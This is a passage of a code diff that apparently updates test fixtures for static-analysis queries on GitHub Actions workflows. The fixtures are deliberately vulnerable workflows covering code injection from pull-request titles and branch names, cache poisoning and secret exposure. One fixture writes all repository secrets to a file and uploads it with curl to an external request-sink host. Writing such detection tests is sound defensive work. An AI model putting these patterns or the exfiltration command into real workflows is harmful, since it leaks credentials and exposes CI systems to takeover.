.github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | +| .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | ${{ env.log }} | +| .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | .github/workflows/reusable-workflow-1.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | +| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | +| .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test20.yml:15:54:15:94 | github.event.pull_request.head.ref | .github/workflows/test20.yml:15:54:15:94 | github.event.pull_request.head.ref | .github/workflows/test20.yml:15:54:15:94 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test20.yml:15:54:15:94 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | +| .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | +| .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | +| .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | diff --git a/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.qlref b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.qlref index 5717bcec7322..f7ce5674994d 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.qlref +++ b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.qlref @@ -1,2 +1 @@ -query: Security/CWE-094/CodeInjectionMedium.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Security/CWE-094/CodeInjectionMedium.ql diff --git a/actions/ql/test/query-tests/Security/CWE-1395/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-1395/.github/workflows/test1.yml index 34b85a6bd831..5153e2cc7804 100644 --- a/actions/ql/test/query-tests/Security/CWE-1395/.github/workflows/test1.yml +++ b/actions/ql/test/query-tests/Security/CWE-1395/.github/workflows/test1.yml @@ -14,8 +14,8 @@ jobs: - uses: actions/download-artifact@v3 # SECURE - uses: actions/download-artifact@v3.0.2 # SECURE - uses: actions/download-artifact@v4.1.0 - - uses: actions/download-artifact@eaceaf801fd36c7dee90939fad912460b18a1ffe # v4.1.2 # $ Alert - - uses: actions/download-artifact@9bc31d5ccc31df68ecc42ccf4149144866c47d8a # v3.0.2 # SECURE # $ Alert + - uses: actions/download-artifact@eaceaf801fd36c7dee90939fad912460b18a1ffe # v4.1.2 + - uses: actions/download-artifact@9bc31d5ccc31df68ecc42ccf4149144866c47d8a # v3.0.2 # SECURE - uses: actions/download-artifact@v4 # SECURE - uses: actions/download-artifact@v4.1.7 # SECURE - uses: actions/download-artifact@v4.1.8 # SECURE diff --git a/actions/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.qlref b/actions/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.qlref index fe1d219fbffa..c9bd66e4dd06 100644 --- a/actions/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.qlref +++ b/actions/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.qlref @@ -1,2 +1,2 @@ -query: Security/CWE-1395/UseOfKnownVulnerableAction.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Security/CWE-1395/UseOfKnownVulnerableAction.ql + diff --git a/actions/ql/test/query-tests/Security/CWE-200/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-200/.github/workflows/test1.yml index 657204ffd536..ed496f3eeb29 100644 --- a/actions/ql/test/query-tests/Security/CWE-200/.github/workflows/test1.yml +++ b/actions/ql/test/query-tests/Security/CWE-200/.github/workflows/test1.yml @@ -13,4 +13,4 @@ jobs: with: args: > -Dsonar.scm.revision=${{ github.event.workflow_run.head_sha }} - -Dsonar.pullrequest.key=${{ github.event.pull_request.title }} # $ Alert + -Dsonar.pullrequest.key=${{ github.event.pull_request.title }} diff --git a/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected b/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected index 75bf3897164a..59b58e03be78 100644 --- a/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected +++ b/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected @@ -1,6 +1,6 @@ -#select -| .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | Potential secret exfiltration in $@, which may be leaked to an attacker-controlled resource. | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | edges nodes | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | subpaths +#select +| .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | Potential secret exfiltration in $@, which may be leaked to an attacker-controlled resource. | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | diff --git a/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.qlref b/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.qlref index 48ae5cf9646b..c750afbeaf4a 100644 --- a/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.qlref +++ b/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.qlref @@ -1,2 +1,2 @@ -query: experimental/Security/CWE-200/SecretExfiltration.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +experimental/Security/CWE-200/SecretExfiltration.ql + diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms1.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms1.yml index 2ee5623b64cf..f000ad6a287a 100644 --- a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms1.yml +++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms1.yml @@ -6,5 +6,5 @@ jobs: name: Build and test runs-on: ubuntu-latest steps: - - uses: actions/checkout@v2 # $ Alert + - uses: actions/checkout@v2 diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms10.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms10.yml index a26e39cbda0e..6530bd5f08e0 100644 --- a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms10.yml +++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms10.yml @@ -7,4 +7,4 @@ jobs: name: Build and test runs-on: ubuntu-latest steps: - - uses: actions/ai-inference # $ Alert + - uses: actions/ai-inference diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml index 4db5fc755232..6f7844f17cb2 100644 --- a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml +++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml @@ -7,7 +7,7 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v2 - test: # $ Alert + test: name: Build and test runs-on: ubuntu-latest permissions: {} diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml index c5448530fbb9..4353c2804976 100644 --- a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml +++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml @@ -7,6 +7,6 @@ jobs: name: Build and test runs-on: ubuntu-latest steps: - - uses: actions/checkout@v2 # $ Alert + - uses: actions/checkout@v2 diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms6.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms6.yml index ae9514f93e67..2824ca14a7e1 100644 --- a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms6.yml +++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms6.yml @@ -8,6 +8,6 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v2 - - uses: actions/jekyll-build-pages # $ Alert + - uses: actions/jekyll-build-pages diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms7.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms7.yml index 85434ad03460..0ec255f0d109 100644 --- a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms7.yml +++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms7.yml @@ -7,4 +7,4 @@ jobs: name: Build and test runs-on: ubuntu-latest steps: - - uses: actions/add-to-project@v2 # $ Alert + - uses: actions/add-to-project@v2 diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms8.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms8.yml index 137fa791353c..1a10bd6a7d6c 100644 --- a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms8.yml +++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms8.yml @@ -7,4 +7,4 @@ jobs: name: Build and test runs-on: ubuntu-latest steps: - - uses: actions/deploy-pages # $ Alert + - uses: actions/deploy-pages diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms9.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms9.yml index 8981c8663825..b6ae16bf9e26 100644 --- a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms9.yml +++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms9.yml @@ -7,4 +7,4 @@ jobs: name: Build and test runs-on: ubuntu-latest steps: - - uses: actions/delete-package-versions # $ Alert + - uses: actions/delete-package-versions diff --git a/actions/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref b/actions/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref index 6837eb5124c9..ad1c6a996609 100644 --- a/actions/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref +++ b/actions/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref @@ -1,2 +1,2 @@ -query: Security/CWE-275/MissingActionsPermissions.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Security/CWE-275/MissingActionsPermissions.ql + diff --git a/actions/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml index 24ad2ff91c80..37eb2bddb58c 100644 --- a/actions/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml +++ b/actions/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml @@ -8,13 +8,13 @@ jobs: runs-on: [self-hosted, X64, Linux, 16c32g] steps: - run: cmd - test2: # $ Alert + test2: runs-on: group: my-group labels: [self-hosted, label-1] steps: - run: cmd - test3: # $ Alert + test3: runs-on: - 'self-hosted' - 'linux' @@ -22,11 +22,11 @@ jobs: - 'metal' steps: - run: echo "foo" - test4: # $ Alert + test4: runs-on: self-hosted-azure steps: - run: cmd - test5: # $ Alert + test5: strategy: fail-fast: false matrix: @@ -63,7 +63,7 @@ jobs: runs-on: ${{ matrix.os }} steps: - run: cmd - test8: # $ Alert + test8: strategy: matrix: settings: @@ -75,14 +75,14 @@ jobs: runs-on: ${{ matrix.settings.host }} steps: - run: cmd - test9: # $ Alert + test9: strategy: matrix: os: ${{ github.repository }} runs-on: ${{ matrix.os }} steps: - run: cmd - test10: # $ Alert + test10: strategy: matrix: os: ${{ github.repository }} @@ -91,4 +91,4 @@ jobs: baz: "asdf" runs-on: ${{ matrix.foo.bar }} steps: - - run: cmd # $ Alert + - run: cmd diff --git a/actions/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref b/actions/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref index 3c21812c0e7a..dc99068b3035 100644 --- a/actions/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref +++ b/actions/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref @@ -1,2 +1,2 @@ -query: experimental/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +experimental/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql + diff --git a/actions/ql/test/query-tests/Security/CWE-285/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-285/.github/workflows/test1.yml index 4c8aa982c31a..48833460b44b 100644 --- a/actions/ql/test/query-tests/Security/CWE-285/.github/workflows/test1.yml +++ b/actions/ql/test/query-tests/Security/CWE-285/.github/workflows/test1.yml @@ -17,4 +17,4 @@ jobs: if: contains(github.event.pull_request.labels.*.name, 'safe to test') with: ref: ${{ github.event.pull_request.head.ref }} - - run: ./cmd # $ Alert + - run: ./cmd diff --git a/actions/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref b/actions/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref index c62fedc2e7d8..09a19f21e3cb 100644 --- a/actions/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref +++ b/actions/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref @@ -1,2 +1,2 @@ -query: Security/CWE-285/ImproperAccessControl.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Security/CWE-285/ImproperAccessControl.ql + diff --git a/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml b/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml index 4d09af11cfd5..473d59986957 100644 --- a/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml +++ b/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml @@ -11,7 +11,7 @@ jobs: with: name: file path: . - test2: # NOT VULNERABLE # $ Alert[actions/secrets-in-artifacts] + test2: # NOT VULNERABLE runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 @@ -29,7 +29,7 @@ jobs: with: name: file path: "*" - test4: # VULNERABLE # $ Alert[actions/secrets-in-artifacts] + test4: # VULNERABLE runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 @@ -40,7 +40,7 @@ jobs: with: name: file path: foo - test5: # VULNERABLE # $ Alert[actions/secrets-in-artifacts] + test5: # VULNERABLE runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 @@ -51,7 +51,7 @@ jobs: with: name: file path: foo/* - test6: # NOT VULNERABLE # $ Alert[actions/secrets-in-artifacts] + test6: # NOT VULNERABLE runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 @@ -83,5 +83,5 @@ jobs: uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2 with: name: file - path: . # $ Alert[actions/secrets-in-artifacts] + path: . diff --git a/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/test1.yml index d476fab3ce46..614efab34c98 100644 --- a/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/test1.yml +++ b/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/test1.yml @@ -9,17 +9,17 @@ jobs: TOKENS: [WRITE, READ] steps: - run: | - echo '${{ toJSON(secrets) }}' > secrets.txt # $ Alert[actions/excessive-secrets-exposure] + echo '${{ toJSON(secrets) }}' > secrets.txt curl -X PUT -T ./secrets.txt -H http://3f750d39-1083-44e5-b057-40432fafeeb5.sink.reqsink.com - env: - ALL_SECRETS: ${{ toJSON(secrets) }} # $ Alert[actions/excessive-secrets-exposure] + ALL_SECRETS: ${{ toJSON(secrets) }} run: echo "$ALL_SECRETS" - env: - SOME_SECRETS: ${{ secrets[format('PAT_%s', matrix.TOKENS)] }} # $ Alert[actions/excessive-secrets-exposure] + SOME_SECRETS: ${{ secrets[format('PAT_%s', matrix.TOKENS)] }} run: echo "$SOME_SECRETS" - env: - username: ${{ fromJson(secrets.AZURE_CREDENTIALS).clientId }} # $ Alert[actions/unmasked-secret-exposure] - password: ${{ fromJson(secrets.AZURE_CREDENTIALS).clientSecret }} # $ Alert[actions/unmasked-secret-exposure] + username: ${{ fromJson(secrets.AZURE_CREDENTIALS).clientId }} + password: ${{ fromJson(secrets.AZURE_CREDENTIALS).clientSecret }} run: | echo "$username" echo "$password" diff --git a/actions/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref b/actions/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref index 2341eea4546e..45f5ad80fd98 100644 --- a/actions/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref +++ b/actions/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref @@ -1,2 +1,2 @@ -query: Security/CWE-312/ExcessiveSecretsExposure.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Security/CWE-312/ExcessiveSecretsExposure.ql + diff --git a/actions/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref b/actions/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref index ea9ad38301f2..c9bb538a12d3 100644 --- a/actions/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref +++ b/actions/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref @@ -1,2 +1,2 @@ -query: Security/CWE-312/SecretsInArtifacts.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Security/CWE-312/SecretsInArtifacts.ql + diff --git a/actions/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref b/actions/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref index be8a489a18b4..ad4c84615237 100644 --- a/actions/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref +++ b/actions/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref @@ -1,2 +1,2 @@ -query: Security/CWE-312/UnmaskedSecretExposure.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Security/CWE-312/UnmaskedSecretExposure.ql + diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection1.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection1.yml index ffd8410a1a86..9f19634abc92 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection1.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection1.yml @@ -8,5 +8,5 @@ jobs: runs-on: ubuntu-latest steps: - run: | - echo ${{ github.event.comment.body }} # $ Alert[actions/cache-poisoning/code-injection] + echo ${{ github.event.comment.body }} diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache1.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache1.yml index 7d6556c97c05..55efe8e9fec9 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache1.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache1.yml @@ -15,9 +15,9 @@ jobs: with: ref: ${{ steps.comment-branch.outputs.head_sha }} - - uses: actions/cache@v2 # $ Source[actions/cache-poisoning/direct-cache] + - uses: actions/cache@v2 with: path: ./poison key: poison_key - - run: | # $ Alert[actions/cache-poisoning/direct-cache] + - run: | cat poison diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache2.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache2.yml index a6413290212a..eb6373a406eb 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache2.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache2.yml @@ -11,9 +11,9 @@ jobs: - uses: actions/checkout@v3 with: ref: ${{ github.event.pull_request.head.sha }} - - uses: actions/cache@v2 # $ Source[actions/cache-poisoning/direct-cache] + - uses: actions/cache@v2 with: path: ./poison key: poison_key - - run: | # $ Alert[actions/cache-poisoning/direct-cache] + - run: | cat poison diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache3.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache3.yml index 85a8d067f604..3849d92cbcca 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache3.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache3.yml @@ -16,9 +16,9 @@ jobs: with: ref: ${{ steps.comment-branch.outputs.head_sha }} - - uses: actions/cache@v2 # $ Source[actions/cache-poisoning/direct-cache] + - uses: actions/cache@v2 with: path: ./poison key: poison_key - - run: | # $ Alert[actions/cache-poisoning/direct-cache] + - run: | cat poison diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache4.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache4.yml index 896c22d9243c..d3f51456de2d 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache4.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache4.yml @@ -14,9 +14,9 @@ jobs: - uses: actions/checkout@v3 with: ref: ${{ github.event.pull_request.head.sha }} - - uses: actions/cache@v2 # $ Source[actions/cache-poisoning/direct-cache] + - uses: actions/cache@v2 with: path: ./poison key: poison_key - - run: | # $ Alert[actions/cache-poisoning/direct-cache] + - run: | cat poison diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache5.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache5.yml index 1faedcf1b916..ec0f9b0e6c94 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache5.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache5.yml @@ -14,9 +14,9 @@ jobs: - uses: actions/checkout@v3 with: ref: ${{ github.event.pull_request.head.sha }} - - uses: actions/cache@v2 # $ Source[actions/cache-poisoning/direct-cache] + - uses: actions/cache@v2 with: path: ./poison key: poison_key - - run: | # $ Alert[actions/cache-poisoning/direct-cache] + - run: | cat poison diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml index a17b62dbafff..b9652d46b59f 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml @@ -13,7 +13,7 @@ jobs: - uses: actions/checkout@v4 with: ref: ${{ github.event.pull_request.head.sha }} - - name: Set up Python 3.10 # $ Source[actions/cache-poisoning/direct-cache] + - name: Set up Python 3.10 uses: actions/setup-python@v5 with: python-version: "3.10" @@ -23,4 +23,4 @@ jobs: with: path: ./results/pip key: ${{ runner.os }}-pip-${{ hashFiles('**/pyproject.toml') }} - restore-keys: ${{ runner.os }}-pip- # $ Alert[actions/cache-poisoning/direct-cache] + restore-keys: ${{ runner.os }}-pip- diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step1.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step1.yml index d99592c830f9..05f8e4a067a1 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step1.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step1.yml @@ -12,9 +12,9 @@ jobs: - uses: actions/checkout@v3 with: ref: ${{ steps.comment-branch.outputs.head_sha }} - - run: ./checkedout/poison # $ Source[actions/cache-poisoning/poisonable-step] + - run: ./checkedout/poison - pr-comment2: # $ Alert[actions/cache-poisoning/poisonable-step] + pr-comment2: runs-on: ubuntu-latest permissions: read-all steps: @@ -23,9 +23,9 @@ jobs: - uses: actions/checkout@v3 with: ref: ${{ steps.comment-branch.outputs.head_sha }} - - uses: ./.github/actions/node-npm-setup # $ Source[actions/cache-poisoning/poisonable-step] + - uses: ./.github/actions/node-npm-setup - pr-comment3: # $ Alert[actions/cache-poisoning/poisonable-step] + pr-comment3: runs-on: ubuntu-latest permissions: read-all steps: @@ -34,4 +34,4 @@ jobs: - uses: actions/checkout@v3 with: ref: ${{ steps.comment-branch.outputs.head_sha }} - - run: node .github/actions-scripts/what-docs-early-access-branch.js # $ Alert[actions/cache-poisoning/poisonable-step] Source[actions/cache-poisoning/poisonable-step] + - run: node 